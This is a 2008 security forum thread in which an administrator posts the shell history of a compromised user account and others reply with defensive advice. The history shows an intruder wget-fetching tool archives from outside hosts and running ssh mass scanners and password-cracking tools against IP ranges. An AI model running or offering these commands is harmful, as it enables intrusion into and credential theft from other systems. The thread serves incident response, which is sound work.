Re: Possible attack?

Re: Possible attack?
Secure Home | Search | About
Login Password
Register Now! Lost Password?
 General Computer Security    Post an article   get this group's latest topics as an RSS feed add this group's latest topics to your My MSN content add this group's latest topics to your My Yahoo content add this group's latest topics to your Google content
Subject Author Date
Re: Possible attack? Anon E. Muss 09-19-2008
Posted by Anon E. Muss on September 19, 2008, 3:15 pm
If you were  Registered and logged in, you could reply and use other advanced thread options


On Fri, 19 Sep 2008 17:17:13 +0000 (UTC), Sylvain Robitaille

>Anon E Muss wrote:
>
>> Below is most of output of netstat. Can someone let me know what is
>> going on here?

[...]

>Your machine is port-scanning what appears to be 218.0.0.0/11 for ssh
>servers. You need to make it stop that. If you blocked 201/8
>yesterday, and 218/8 today, you might want to try to find what data it
>gathered in the meantime for 202/8 to 217/8. More seriously, you need
>to identify the process that is performing the scan, and stop it. Then
>you need to figure out how it got there and deal with that.
>
>> ... any suggestions??
>
>Look for a probable compromise by similar means. Judging by the
>client-side ports (on your system) used in the scan, I don't think that
>a privileged account was compromised (and therefore your system itself
>is probably not compromised, unless the compromised account was able to
>use local privilege escalation). Another frequent source of account
>compromise seems to be some web-based services.

One of my users had a stupid password and had his account compromised.
Upon reviewing the logs, it looks like this was going on for about 4
days:

$ cat .bash_history

[...]
passwd
w
uname -a
cat /proc/cpuinfo
ls -a
uptime
cat /proc/cpuinfo
w
ls -a
w
uanme -a
uname -a
ls -a
w
uname -a
ps -x
w
ls -a
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
rm -rf ssh.tgz
cd ssh
chmod +x *
wget http://nasa-undernet.ucoz.org/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
chmod +x *
screen -r
screen
./mass 117
cd ssh
./screen -r
ls -a
ps x
kill -9 12305
nano vuln.txt
ps x
ls -a
cd ..
rm -rf ssh
ls -a
w
ls -a
uname -a
cat /proc/cpuinfo
ls -a
uname -a
uptime
ps x
cat /proc/cpuinfo
ls -a
cat /proc/cpuinfo
ftp 61.184.136.12
ftp 61.184.136.12
tar zxvf webmin.tgz
cd webmin
./scan 79.15
./scan 91.80
./scan 161.53
./unshadow 161.53/
./scan 200.168
./unshadow 200.168/
./scan 201.10
./scan 202.66
./scan 92.114
./unshadow 92.114
cd
ls
cd webmin
ls
cd
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
cd ssh
http://www12.asphost4free.com/mrtiger/screen.tgz
wget http://www12.asphost4free.com/mrtiger/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
./screen
./mass 61
./screen
w
passwd
w
uname -a
cat /proc/cpuinfo
uname -a
w
cat /proc/cpuinfo
ls -a
cd webmin
ls -a
./scan 69.13
./unshadow 69.13/
w
ls -a
cd ssh
ls -a
cat vuln.txt
cd ..
cd webmin
./scan 82.146
ls -a
cd ..
ls -a
cd ssh
ls -a
screen
w
ls -a
cd ssh
ls -a
./screen -r
screen -wipe
cat culn.txt
cat vuln.txt
ls -a
./screen
w
ls -a
cd ssh
./screen -r
cat vuln.txt
cd ssh
./screen -r
cat vuln.txt
cd ssh
cat vuln.txt
screen -r
ps x
./screen -r
./mass 62
./mass 61
cd ssh
cat vuln.txt
screen -r
./screen -r
./screen -wipe
./screen
ls -a
cd ssh
./screen -r
cat vuln.txt
./screen -r
cat vuln.txt
./mass 201
cd ssh
./screen -r
cat vuln.txt
ls +a
./screen
cd ssh
cat vuln.txt
screen -r
./screen -r
./screen -r
./screen -r
cd ..
ls -a
wget joke4u.diinoweb.com/files/Cristina.tgz
rm -rf Cristina.tgz
cd ssh
./screen -r
./mass 218
cd ssh
./screen -r
[...]

>I hope I've helped ...

You did. Thanks.

I also installed "fail2ban" as someone else advised.

Posted by Tim Greer on September 19, 2008, 6:48 pm
If you were  Registered and logged in, you could reply and use other advanced thread options


Anon E. Muss wrote:

> On Fri, 19 Sep 2008 17:17:13 +0000 (UTC), Sylvain Robitaille
>
>>Anon E Muss wrote:
>>
>>> Below is most of output of netstat. Can someone let me know what is
>>> going on here?
>
> [...]
>
>>Your machine is port-scanning what appears to be 218.0.0.0/11 for ssh
>>servers. You need to make it stop that. If you blocked 201/8
>>yesterday, and 218/8 today, you might want to try to find what data it
>>gathered in the meantime for 202/8 to 217/8. More seriously, you need
>>to identify the process that is performing the scan, and stop it.
>>Then you need to figure out how it got there and deal with that.
>>
>>> ... any suggestions??
>>
>>Look for a probable compromise by similar means. Judging by the
>>client-side ports (on your system) used in the scan, I don't think
>>that a privileged account was compromised (and therefore your system
>>itself is probably not compromised, unless the compromised account was
>>able to
>>use local privilege escalation). Another frequent source of account
>>compromise seems to be some web-based services.
>
> One of my users had a stupid password and had his account compromised.
> Upon reviewing the logs, it looks like this was going on for about 4
> days:
>
> $ cat .bash_history
>

<snip>

You should block outgoing requests to port 22, and only allow trusted
destinations, so your server can't be the source of an attack again.
Do the same for other similar ports/services. Also, consider applying
some rate limit policies for the one's you do trust as destinations.
Additionally, you should report the sites in question the files were
downloaded from and add some mod_security rules (if you use Apache) for
POST/GET requests for those file names, and block outgoing access to
those servers as well. Finally, you should be sure you don't allow any
users to bind services to ports above 1024 without verifying they are
okay (if you allow that at all).
--
Tim Greer, CEO/Founder/CTO, BurlyHost.com, Inc.
Shared Hosting, Reseller Hosting, Dedicated & Semi-Dedicated servers
and Custom Hosting. 24/7 support, 30 day guarantee, secure servers.
Industry's most experienced staff! -- Web Hosting With Muscle!

Similar ThreadsPosted
how can i tell if under attack? October 16, 2005, 10:57 pm
Re: Possible attack? September 19, 2008, 5:40 pm
Re: Possible attack? December 2, 2008, 12:57 pm
Attack statistics... August 11, 2004, 8:09 pm
What does denial of service attack mean? April 30, 2005, 10:05 am
webserver attack attempt July 14, 2005, 5:24 am
Network Attack generator November 28, 2005, 9:49 am
DOS Attack & High load June 29, 2007, 5:58 am
Re: MI5 messages are a DDOS attack? November 18, 2007, 7:27 pm
SSRT3521 rev.2 HP-UX OpenSSL CBC timing attack in SSL and TLS July 5, 2004, 3:32 pm

The site map in XML format XML site map

Contact Us | Privacy Policy